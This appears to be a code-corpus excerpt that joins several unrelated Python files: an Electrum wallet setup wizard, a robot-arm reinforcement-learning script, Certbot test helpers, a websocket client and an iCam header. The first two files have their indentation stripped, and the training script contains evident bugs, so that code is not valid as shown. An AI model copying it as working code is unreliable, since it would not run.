slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next):
return self.text_input(title, message, is_valid)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind):
playout = PasswordLayout(None, msg, kind, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW)
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning=''):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
gym_reach7dof_train_1b.py | #### Training agent in Pusher7Dof gym env using a single real-world env
## 1a,1b : Trying threading for running rendering in parallel while taking actions
## Wrtitten by : leopauly | cnlp@leeds.ac.uk
## Courtesy for DDPG implementation : Steven Spielberg Pon Kumar (github.com/stevenpjg)
####
##Imports
import gym
from gym.spaces import Box, Discrete
import numpy as np
import cv2
from ddpg import DDPG
from ou_noise import OUNoise
import matplotlib.pyplot as plt
import scipy.misc as misc
## Imports for DNN
import os
from threading import Thread, Lock
import sys
from six.moves import xrange # pylint: disable=redefined-builtin
import PIL.Image as Image
import random
import numpy as np
import cv2
import time
import math
import matplotlib.pyplot as plt
import tensorflow as tf
from keras import backend as K
## Custom scripts
import lscript as lsp
import modelling as md
## Defining env
env = gym.make('Pusher7DOF-v1')
env.reset()
assert isinstance(env.observation_space, Box), "observation space must be continuous"
assert isinstance(env.action_space, Box), "action space must be continuous"
## Defining vars for reinfrocement learning algo
num_episodes=1000
num_rollouts=200
steps=num_rollouts
is_batch_norm = False #batch normalization switch
xrange=range
start_training=64
## vars for feature extraction
height=112
width=112
channel=3
crop_size=112
cluster_length=16
nb_classes=2
feature_size=4608 #8192 #16384 #487
saved_path='/home/ironman/trained_activity_nets/'
batch_size=32
demo_folder='./Demo_reach_1/'
## Defining placeholders in tf for images and targets
x_image = tf.placeholder(tf.float32, [None, 16,height,width,channel],name='x')
y_true = tf.placeholder(tf.float32, [None, nb_classes],name='y_true')
y_true_cls = tf.placeholder(tf.int64, [None],name='y_true_cls')
model_keras = md.C3D_ucf101_training_model_tf(summary=True)
out=model_keras(x_image)
y_pred = tf.nn.softmax(out)
y_pred_cls = tf.argmax(out, dimension=1)
correct_prediction = tf.equal(y_pred_cls, y_true_cls)
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print('Loading netwrok framework finished..!!',flush=True)
def get_compress_frames_data(filename, num_frames_per_clip=cluster_length):
ret_arr = []
for parent, dirnames, filenames in os.walk(filename):
filenames = sorted(filenames)
jump=math.floor((len(filenames)/num_frames_per_clip))
loop=0
for i in range(0,len(filenames),jump):
if (loop>15):
break
if (filenames[i].endswith('.png')):
image_name = str(filename) + '/' + str(filenames[i])
img = Image.open(image_name)
img_data = np.array(img)
ret_arr.append(img_data)
loop=loop+1
ret_arr=np.array(ret_arr)
#ret_arr=ret_arr/255
return ret_arr
## Start the session with logging placement.
init_op = tf.global_variables_initializer()
sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True, log_device_placement=False))
sess.run(init_op)
## Restore model weights from previously saved model
saver = tf.train.import_meta_graph(os.path.join(saved_path,'activity_model.ckpt-104.meta'))
saver.restore(sess, os.path.join(saved_path,'activity_model.ckpt-104'))
print("Model restored from file: %s" % saved_path,flush=True)
def demo_feature_extractor(demo_vid_path):
demo_vid_array=get_compress_frames_data(demo_vid_path)
return feature_extractor(demo_vid_array)
## For extracting activity features
def feature_extractor(vid_np):
#print('shape of video for feature extraction:',vid_np.shape)
vid_=vid_np.reshape(-1,cluster_length,height,width,channel)
#print(tf.contrib.graph_editor.get_tensors(tf.get_default_graph()))
#print(tf.get_default_graph().as_graph_def())
f_v = sess.graph.get_tensor_by_name('flatten_1/Reshape:0')
f_v_val=np.array(sess.run([f_v], feed_dict={'conv1_input:0':vid_,x_image:vid_,K.learning_phase(): 0 }))
#print('extracted video features shape:',f_v_val.shape)
features=np.reshape(f_v_val,(-1))
#print('features_shape',features.shape)
return features
def distance(f_demo,f_robo):
#print('shape f_demo',f_demo.shape,'shape f_demo',f_robo.shape)
return np.linalg.norm(f_demo-f_robo)
def s2l():
#Randomly initialize critic,actor,target critic, target actor network and replay buffer
num_states = feature_size #num_states = env.observation_space.shape[0]
num_actions = env.action_space.shape[0]
print ("Number of States:", num_states)
print ("Number of Actions:", num_actions)
agent = DDPG(env, is_batch_norm,num_states,num_actions)
exploration_noise = OUNoise(env.action_space.shape[0])
counter=0
reward_per_episode = 0
total_reward=0
print ("Number of Steps per episode:", steps)
reward_st = np.array([0]) #saving reward
demo_features=demo_feature_extractor(demo_folder)
for episode in range(num_episodes):
print ("==== Starting episode no:",episode,"====","\n")
env.reset() # Reset env in the begining of each episode
env.render()
obs_vid=[]
for i in range(16):
obs_img=env.render(mode='rgb_array') # Get the observation
obs_new=misc.imresize(obs_img,[112,112,3])
obs_vid.append(obs_new)
obs_vid=np.array(obs_vid)
observation =feature_extractor(obs_vid)
reward_per_episode = 0
for t in range(steps):
x = observation
action = agent.evaluate_actor(np.reshape(x,[1,num_states]))
noise = exploration_noise.noise()
action = action[0] + noise #Select action according to current policy and exploration noise
print ("Action at step", t ," :",action,"\n")
child_thread = Thread(target=child_function)
child_thread.start()
with io_lock:
_,_,done,info=env.step(action)
env.render()
print("Parent process continuing.")
vid_robo_=[]
for i in range(16):
obs=env.render(mode='rgb_array') # Get the observation
obs_new=misc.imresize(obs,[112,112,3])
vid_robo_.append(obs_new)
vid_robo=np.array(vid_robo_)
robo_features=feature_extractor(vid_robo)
observation=robo_features
reward=-(distance(demo_features,robo_features))
print('reward: ',reward)
#add s_t,s_t+1,action,reward to experience memory
agent.add_experience(x,observation,action,reward,done)
#train critic and actor network
if counter > start_training:
agent.train()
reward_per_episode+=reward
counter+=1
#check if episode ends:
if (done or (t == steps-1)):
print ('EPISODE: ',i,' Steps: ',t,' Total Reward: ',reward_per_episode)
print ("Printing reward to file")
exploration_noise.reset() #reinitializing random noise for action exploration
reward_st = np.append(reward_st,reward_per_episode)
np.savetxt('episode_reward.txt',reward_st, newline="\n")
print ('\n\n')
break
total_reward+=reward_per_episode
print ("Average reward per episode {}".format(total_reward / episodes))
def child_function():
i = 1000*20394
print("Child starts recording. Did stuff: " + str(i))
return
io_lock = Lock()
s2l()
|
util.py | """Test utilities."""
import logging
from multiprocessing import Event
from multiprocessing import Process
import shutil
import sys
import tempfile
import unittest
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
import josepy as jose
import mock
import OpenSSL
import pkg_resources
import six
from six.moves import reload_module
from certbot import interfaces
from certbot import util
from certbot._internal import configuration
from certbot._internal import constants
from certbot._internal import lock
from certbot._internal import storage
from certbot.compat import filesystem
from certbot.compat import os
from certbot.display import util as display_util
def vector_path(*names):
"""Path to a test vector."""
return pkg_resources.resource_filename(
__name__, os.path.join('testdata', *names))
def load_vector(*names):
"""Load contents of a test vector."""
# luckily, resource_string opens file in binary mode
data = pkg_resources.resource_string(
__name__, os.path.join('testdata', *names))
# Try at most to convert CRLF to LF when data is text
try:
return data.decode().replace('\r\n', '\n').encode()
except ValueError:
# Failed to process the file with standard encoding.
# Most likely not a text file, return its bytes untouched.
return data
def _guess_loader(filename, loader_pem, loader_der):
_, ext = os.path.splitext(filename)
if ext.lower() == '.pem':
return loader_pem
elif ext.lower() == '.der':
return loader_der
raise ValueError("Loader could not be recognized based on extension") # pragma: no cover
def load_cert(*names):
"""Load certificate."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_certificate(loader, load_vector(*names))
def load_csr(*names):
"""Load certificate request."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_certificate_request(loader, load_vector(*names))
def load_comparable_csr(*names):
"""Load ComparableX509 certificate request."""
return jose.ComparableX509(load_csr(*names))
def load_rsa_private_key(*names):
"""Load RSA private key."""
loader = _guess_loader(names[-1], serialization.load_pem_private_key,
serialization.load_der_private_key)
return jose.ComparableRSAKey(loader(
load_vector(*names), password=None, backend=default_backend()))
def load_pyopenssl_private_key(*names):
"""Load pyOpenSSL private key."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_privatekey(loader, load_vector(*names))
def make_lineage(config_dir, testfile):
"""Creates a lineage defined by testfile.
This creates the archive, live, and renewal directories if
necessary and creates a simple lineage.
:param str config_dir: path to the configuration directory
:param str testfile: configuration file to base the lineage on
:returns: path to the renewal conf file for the created lineage
:rtype: str
"""
lineage_name = testfile[:-len('.conf')]
conf_dir = os.path.join(
config_dir, constants.RENEWAL_CONFIGS_DIR)
archive_dir = os.path.join(
config_dir, constants.ARCHIVE_DIR, lineage_name)
live_dir = os.path.join(
config_dir, constants.LIVE_DIR, lineage_name)
for directory in (archive_dir, conf_dir, live_dir,):
if not os.path.exists(directory):
filesystem.makedirs(directory)
sample_archive = vector_path('sample-archive')
for kind in os.listdir(sample_archive):
shutil.copyfile(os.path.join(sample_archive, kind),
os.path.join(archive_dir, kind))
for kind in storage.ALL_FOUR:
os.symlink(os.path.join(archive_dir, '{0}1.pem'.format(kind)),
os.path.join(live_dir, '{0}.pem'.format(kind)))
conf_path = os.path.join(config_dir, conf_dir, testfile)
with open(vector_path(testfile)) as src:
with open(conf_path, 'w') as dst:
dst.writelines(
line.replace('MAGICDIR', config_dir) for line in src)
return conf_path
def patch_get_utility(target='zope.component.getUtility'):
"""Patch zope.component.getUtility to use a special mock IDisplay.
The mock IDisplay works like a regular mock object, except it also
also asserts that methods are called with valid arguments.
:param str target: path to patch
:returns: mock zope.component.getUtility
:rtype: mock.MagicMock
"""
return mock.patch(target, new_callable=_create_get_utility_mock)
def patch_get_utility_with_stdout(target='zope.component.getUtility',
stdout=None):
"""Patch zope.component.getUtility to use a special mock IDisplay.
The mock IDisplay works like a regular mock object, except it also
also asserts that methods are called with valid arguments.
The `message` argument passed to the IDisplay methods is passed to
stdout's write method.
:param str target: path to patch
:param object stdout: object to write standard output to; it is
expected to have a `write` method
:returns: mock zope.component.getUtility
:rtype: mock.MagicMock
"""
stdout = stdout if stdout else six.StringIO()
freezable_mock = _create_get_utility_mock_with_stdout(stdout)
return mock.patch(target, new=freezable_mock)
class FreezableMock(object):
    """Mock object with the ability to freeze attributes.

    This class works like a regular mock.MagicMock object, except
    attributes and behavior set before the object is frozen cannot
    be changed during tests.

    If a func argument is provided to the constructor, this function
    is called first when an instance of FreezableMock is called,
    followed by the usual behavior defined by MagicMock. The return
    value of func is ignored.
    """
    def __init__(self, frozen=False, func=None, return_value=mock.sentinel.DEFAULT):
        # Names in _frozen_set are served from this instance (not the
        # inner MagicMock) and become immutable once frozen.  'freeze'
        # itself must stay reachable so the object can be frozen later;
        # when created already frozen there is nothing to protect.
        self._frozen_set = set() if frozen else {'freeze', }
        self._func = func
        self._mock = mock.MagicMock()
        if return_value != mock.sentinel.DEFAULT:
            self.return_value = return_value
        self._frozen = frozen
    def freeze(self):
        """Freeze object preventing further changes."""
        self._frozen = True
    def __call__(self, *args, **kwargs):
        # Run the optional hook first; its return value is deliberately
        # discarded in favor of the MagicMock's.
        if self._func is not None:
            self._func(*args, **kwargs)
        return self._mock(*args, **kwargs)
    def __getattribute__(self, name):
        """Route attribute reads between this instance and its MagicMock."""
        if name == '_frozen':
            try:
                return object.__getattribute__(self, name)
            except AttributeError:
                # _frozen may be read (via __setattr__) before __init__
                # has assigned it; treat that as "not frozen".
                return False
        elif name in ('return_value', 'side_effect',):
            # These are always delegated to the underlying MagicMock.
            return getattr(object.__getattribute__(self, '_mock'), name)
        elif name == '_frozen_set' or name in self._frozen_set:
            # Bookkeeping and frozen attributes live on this instance.
            return object.__getattribute__(self, name)
        else:
            # Everything else behaves like a plain MagicMock attribute.
            return getattr(object.__getattribute__(self, '_mock'), name)
    def __setattr__(self, name, value):
        """ Before it is frozen, attributes are set on the FreezableMock
        instance and added to the _frozen_set. Attributes in the _frozen_set
        cannot be changed after the FreezableMock is frozen. In this case,
        they are set on the underlying _mock.

        In cases of return_value and side_effect, these attributes are always
        passed through to the instance's _mock and added to the _frozen_set
        before the object is frozen.
        """
        if self._frozen:
            if name in self._frozen_set:
                raise AttributeError('Cannot change frozen attribute ' + name)
            return setattr(self._mock, name, value)
        if name != '_frozen_set':
            self._frozen_set.add(name)
        if name in ('return_value', 'side_effect'):
            return setattr(self._mock, name, value)
        return object.__setattr__(self, name, value)
def _create_get_utility_mock():
    """Build a frozen mock whose return value is a validating IDisplay mock."""
    display = FreezableMock()
    # Wrap every IDisplay method except 'notification' so each call is
    # checked for valid arguments.
    # Use pylint code for disable to keep on single line under line length limit
    for method_name in interfaces.IDisplay.names():  # pylint: E1120
        if method_name == 'notification':
            continue
        setattr(display, method_name,
                FreezableMock(frozen=True, func=_assert_valid_call))
    display.freeze()
    return FreezableMock(frozen=True, return_value=display)
def _create_get_utility_mock_with_stdout(stdout):
    """Build a frozen mock IDisplay factory that echoes messages to stdout.

    :param object stdout: stream with a ``write`` method that receives the
        `message` argument of every IDisplay call
    :returns: frozen FreezableMock whose return value is the display mock
    """
    def _write_msg(message, *unused_args, **unused_kwargs):
        """Write the message to stdout."""
        if message:
            stdout.write(message)
    def mock_method(*args, **kwargs):
        """
        Mock function for IDisplay methods: validate the call, then echo.
        """
        # BUG FIX: arguments must be unpacked here.  _assert_valid_call is
        # declared as (*args, **kwargs) (and is invoked unpacked when used
        # directly as a FreezableMock func), so the previous packed call
        # _assert_valid_call(args, kwargs) handed the whole args tuple in
        # as `message` and dropped every keyword argument — calls were
        # never actually validated.
        _assert_valid_call(*args, **kwargs)
        _write_msg(*args, **kwargs)
    display = FreezableMock()
    # Use pylint code for disable to keep on single line under line length limit
    for name in interfaces.IDisplay.names():  # pylint: E1120
        if name == 'notification':
            frozen_mock = FreezableMock(frozen=True,
                                        func=_write_msg)
            setattr(display, name, frozen_mock)
        else:
            frozen_mock = FreezableMock(frozen=True,
                                        func=mock_method)
            setattr(display, name, frozen_mock)
    display.freeze()
    return FreezableMock(frozen=True, return_value=display)
def _assert_valid_call(*args, **kwargs):
    """Assert an IDisplay method call carried valid arguments.

    The `message` may arrive positionally or as a keyword; the remaining
    recognized keywords are forwarded with their documented defaults.
    """
    message = args[0] if args else kwargs['message']
    forwarded = {
        'default': kwargs.get('default', None),
        'cli_flag': kwargs.get('cli_flag', None),
        'force_interactive': kwargs.get('force_interactive', False),
    }
    display_util.assert_valid_call(message, **forwarded)
class TempDirTestCase(unittest.TestCase):
    """Base test class which sets up and tears down a temporary directory"""
    def setUp(self):
        """Execute before test"""
        # Each test gets its own scratch directory; removed in tearDown.
        self.tempdir = tempfile.mkdtemp()
    def tearDown(self):
        """Execute after test"""
        # Cleanup opened resources after a test. This is usually done through atexit handlers in
        # Certbot, but during tests, atexit will not run registered functions before tearDown is
        # called and instead will run them right before the entire test process exits.
        # It is a problem on Windows, that does not accept to clean resources before closing them.
        logging.shutdown()
        # Remove logging handlers that have been closed so they won't be
        # accidentally used in future tests.
        logging.getLogger().handlers = []
        # NOTE(review): statement order looks deliberate — locks are
        # released before rmtree, presumably because lock files live
        # inside tempdir and Windows cannot delete open files; confirm.
        util._release_locks() # pylint: disable=protected-access
        shutil.rmtree(self.tempdir)
class ConfigTestCase(TempDirTestCase):
    """Test class which sets up a NamespaceConfig object."""
    def setUp(self):
        super(ConfigTestCase, self).setUp()
        # Start from the CLI defaults, then point every directory at the
        # per-test temporary directory created by TempDirTestCase.
        self.config = configuration.NamespaceConfig(
            mock.MagicMock(**constants.CLI_DEFAULTS)
        )
        self.config.verb = "certonly"
        for subdir in ('config', 'work', 'logs'):
            setattr(self.config, subdir + '_dir',
                    os.path.join(self.tempdir, subdir))
        self.config.cert_path = constants.CLI_DEFAULTS['auth_cert_path']
        self.config.fullchain_path = constants.CLI_DEFAULTS['auth_chain_path']
        self.config.chain_path = constants.CLI_DEFAULTS['auth_chain_path']
        self.config.server = "https://example.com"
def _handle_lock(event_in, event_out, path):
    """
    Worker: acquire a file lock on path, announce it, and hold it until
    told to release. Coordination happens through the two events.

    :param multiprocessing.Event event_in: signals when to release the lock
    :param multiprocessing.Event event_out: signals when the lock is acquired
    :param path: the path to lock
    """
    # Directories and plain files are locked through different helpers.
    acquire = lock.lock_dir if os.path.isdir(path) else lock.LockFile
    held_lock = acquire(path)
    try:
        event_out.set()
        assert event_in.wait(timeout=20), 'Timeout while waiting to release the lock.'
    finally:
        held_lock.release()
def lock_and_call(callback, path_to_lock):
    """
    Grab a lock on path_to_lock from a foreign process then execute the callback.

    :param callable callback: object to call after acquiring the lock
    :param str path_to_lock: path to file or directory to lock
    """
    # Reload certbot.util module to reset internal _LOCKS dictionary.
    reload_module(util)
    release_signal, acquired_signal = Event(), Event()
    worker = Process(target=_handle_lock,
                     args=(release_signal, acquired_signal, path_to_lock))
    worker.start()
    # Block until the foreign process reports that it holds the lock.
    assert acquired_signal.wait(timeout=10), 'Timeout while waiting to acquire the lock.'
    callback()
    # Let the foreign process release the lock, then reap it.
    release_signal.set()
    worker.join(timeout=10)
    assert worker.exitcode == 0
def skip_on_windows(reason):
    """Decorator to skip permanently a test on Windows. A reason is required."""
    # unittest.skipIf already returns a decorator, so no explicit wrapper
    # function is needed.
    return unittest.skipIf(sys.platform == 'win32', reason)
def temp_join(path):
    """
    Return the given path joined to the tempdir path for the current platform
    Eg.: 'cert' => /tmp/cert (Linux) or 'C:\\Users\\currentuser\\AppData\\Temp\\cert' (Windows)
    """
    tempdir = tempfile.gettempdir()
    return os.path.join(tempdir, path)
|
main.py | # coding=utf-8
import websocket
from threading import Thread
from ..interfaces import IClient
from poco.utils import six
DEFAULT_ADDR = "ws://localhost:5003"
class WebSocketClient(IClient):
    """Poco transport client backed by a background websocket thread.

    Incoming messages are accumulated in an inbox list by the websocket
    callbacks and drained by recv().
    """
    def __init__(self, addr=DEFAULT_ADDR):
        super(WebSocketClient, self).__init__()
        self.addr = addr
        self._inbox = []
        self._ws = None
        self._ws_thread = None

    def connect(self):
        # Reconnecting: drop any existing socket/thread first.
        if self._ws_thread:
            self.close()
        print("connecting server..")
        self._init_ws_thread()

    def send(self, msg):
        # The websocket layer expects text frames.
        if not isinstance(msg, six.text_type):
            msg = msg.decode("utf-8")
        self._ws.send(msg)

    def recv(self):
        # Swap out the accumulated messages and hand them to the caller.
        pending, self._inbox = self._inbox, []
        return pending

    def close(self):
        print("closing connection..")
        self._ws.close()
        self._ws_thread = None

    def _init_ws_thread(self):
        self._ws = self._init_ws()
        worker = Thread(target=self._ws.run_forever)
        worker.daemon = True
        worker.start()
        self._ws_thread = worker

    def _init_ws(self):
        # ws.enableTrace(True)
        return websocket.WebSocketApp(
            self.addr,
            on_open=self._on_ws_open,
            on_message=self._on_ws_message,
            on_error=self._on_ws_error,
            on_close=self._on_ws_close,
        )

    def _on_ws_message(self, ws, message):
        self._inbox.append(message)

    def _on_ws_error(self, ws, error):
        print("on error", error)
        self.on_close()

    def _on_ws_close(self, ws):
        print("on close")
        self.on_close()

    def _on_ws_open(self, ws):
        print('on open')
        self.on_connect()
|
iCam.py | """
-----------------------------------------------------------------------------
Copyright (c) 2009-2014 Alexandru Emilian Susu (icam.service@gmail.com).
License: BSD.
Ideas from many :) .
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
The code tries to be PEP8 compliant with one main exception:
- since we have the ambiguity 0 == False, 1 == True (~inherited from C),
when a == 1, "a is True" returns False; a == True returns True
(if a: is evaluated as True, also)
- similarly for a == 0, "a is False" returns False; a == False returns True
Therefore we do not use "is True" (but "== True")
nor "is False" (instead we use "== False").
-----------------------------------------------------------------------------
"""
"""
Platforms supported:
Note that the predicates for the various OS platforms defined in iCam.py are:
ANDROID_OS
RASPBIAN_OS
SYMBIAN_S60_OS
SYMBIAN_UIQ_OS
SYMBIAN_3
iOS_PYOBJC
WINDOWS_OS
WINDOWS_CE_OS_PYTHONCE
You can use the ppp.py tool to obtain from iCam.py a script for only one
(or more) platform.
Examples of how NOT TO use them:
NOT GOOD:
elif SYMBIAN_3
...
elif SYMBIAN_OS and (S60_EDITION[0] >= 3):
...
-instead use:
elif SYMBIAN_OS:
if SYMBIAN_3:
...
elif S60_EDITION[0] >= 3:
...
NOT GOOD:
if ANDROID_OS is False:
...
-instead use:
if ANDROID_OS:
pass
else:
...
We use the 3 double-quotes to represent ONLY comments that can be discarded,
and not literal strings.
"""
"""
This Python source file is the cross-platform iCam phone client, working for:
ANDROID_OS
SYMBIAN_S60_OS
SYMBIAN_UIQ_OS
iOS_PYOBJC
WINDOWS_OS
WINDOWS_CE_OS_PYTHONCE.
Note that we make the STRONG assumption that:
- for S60 2nd edition phones we run over PyS60 1.4.5
- for S60 3rd edition phones we run over PyS60 2.0.0 (except Nokia E60 and
E65 on which we cannot install this runtime and we have to use
PyS60 1.4.5; also, maybe, non-Nokia phones such as Samsung G810)
After modifying this file, the easiest way to deploy it is to do the following:
- on Android, after installing iCam.apk, compile into byte-code this file
(normally with Python 2.6) and put the byte-code file
in /sdcard/iCam/a.pyc)
- on S60 3rd edition, after installing iCam[...].sis, you can simply copy
the Python source to [DRIVE]:\Private\e21e55ef\default.py, where
[DRIVE] is the drive where you selected to install the SIS.
- iOS PyObjC - just compile into byte-code (normally with Python 2.5) this
file and replace the old a.pyc with the generated bytecode.
- Windows PythonCE - just compile into byte-code (normally with Python 2.5)
this file and replace the old a.pyc with the generated bytecode.
Also, you ~need to copy the iCam.cfg in the LOCAL_FOLDER of the application.
"""
"""
CRC32 could be added to the BT messages as footer CRC: BUT I DON'T
- BT SMF messages - have already CRC in the state part, which is VERY good, media could be corrupted
- FIL - would be useful - but it is already compressed with zlib
- CMD - not really useful
- TXT - not really useful - if error happens, that's it
- TIM - not required since message does NOT contain data.
"""
CURRENT_RELEASE_TIME = "2017_02_22_08_00_00"
"""
We execute before Main() due to lexical order in the script (even when we import this script):
- a lot of initializations for global vars
- imports, with exception handling
- more complex code (function calls, loops, etc) - these are marked in
the code as "# BEFORE_MAIN:".
"""
"""
New BT packet format: we do not compress BT messages and put footer extra info
in SMF in order to allow playing file even in Inbox
"""
#NEW_BT_FORMAT = False
NEW_BT_FORMAT = True
IMEI_UIQOS = "UIQ-device-id"
IMEI_IOS = "iPhone-device-id"
IMEI_UNIXOS = "*nix-device-id"
IMEI_WinCEOS = "Win-mobile-device-id"
IMEI_WinOS = "Win-device-id"
IMEI_6680 = "668066806680668"
IMEI_6120 = "612061206120612"
IMEI_N95 = "N95N95N95N95N95"
IMEI_N82 = "N82N82N82N82N82"
IMEI_G810 = "300300300300300"
IMEI_E7 = "E7E7E7E7E7E7E7E"
IMEI_HTC_TC = "HTCHTCHTCHTCTCR" #HTC P3650
BT_ADDR_6680 = "66:80:66:80:66:80"
BT_ADDR_6120 = "61:20:61:20:61:20"
BT_ADDR_N82 = "82:82:82:82:82:82"
BT_ADDR_N95 = "95:95:95:95:95:95"
BT_ADDR_HTC_TC = "36:50:36:50:36:50" #HTC P3650
BT_ADDR_RPI = "PI:PI:PI:PI:PI:PI"
WIFI_ADDR_N82 = "WI:FI:WI:FI:WI:FI"
# PHONE NUMBER which we call (can be a landline number also).
ALARM_PHONE_NUMBER = "+01234567890" # "+01234567890" #"1234567890"
# PHONE NUMBER which we call or send SMS to.
ALARM_SMS_PHONE_NUMBER = "+01234567890"
# Used by StoreLocalConfigInFile() and GetGooglePassword()
# A 32 bytes long randomly generated (by hand :) ) secret key
